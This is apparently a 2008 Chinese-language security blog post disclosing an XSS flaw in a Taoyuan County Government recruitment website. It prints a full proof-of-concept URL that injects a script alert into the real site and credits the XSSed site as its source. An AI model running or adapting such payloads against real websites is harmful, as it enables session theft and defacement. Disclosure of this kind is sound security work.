桃園縣政府人力e網通網站存在XSS安全漏洞

2008 年 10 月 05 日 – 23:29:25

桃園縣政府人力e網通網站存在XSS (Cross-Site Scripting) 安全漏洞。

測試語法，如下所示：
http://tbank.tycg.gov.tw/search/SearchResult.asp?p=gov&s=taoyuan_attach%27%22%3E%3C/title%3E%3Cscript%3Ealert(1337)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSS%20by%20Stacker%3C/h1%3E%3C/marquee%3E

測試結果，如下圖所示：

注意：此資訊首先揭露於XSSed網站上，此文章之內容皆參考自XSSed網站。

訂閱網誌

Recent Comments
Recent Post
Archives
Categories
- 作業系統 (1)
- 免費軟體 (8)
  - 惡意程式移除工具 (1)
  - 漏洞檢測 (1)
  - 系統檢測 (2)
  - 防毒軟體 (2)
  - 防間諜軟體 (1)
- 其他 (20)
- 問卷調查 (2)
- 工具教學 (10)
- 徵才 (1)
- 教育訓練 (3)
- 數位鑑識 (1)
- 新聞稿 (61)
- 未分類 (1)
- 產業動態 (120)
- 相關連結 (1)
- 研討會 (8)
- 研討會講義/資安文章 (7)
- 網站黑名單 (2)
- 自我觀點 (34)
- 虛擬機器 (1)
- 評比測試 (9)
- 誤判案例 (6)
- 資安新聞 (691)
  - DDOS攻擊 (5)
  - PoC (6)
  - Rootkit (2)
  - XSS (37)
  - 加密與解密 (2)
  - 即時通訊 (8)
  - 垃圾郵件 (9)
  - 威脅報告 (14)
  - 安全更新 (6)
  - 安全漏洞 (87)
  - 廣告軟體 (6)
  - 惡意程式 (501)
  - 搜尋引擎 (2)
  - 網站安全 (536)
  - 網站遭駭 (57)
  - 資料外洩 (1)
  - 釣魚網站 (5)
- 驗證 (2)

大砲開講

桃園縣政府人力e網通網站存在XSS安全漏洞

請在此留下您的意見

訂閱網誌

Recent Comments

Recent Post

Archives

Categories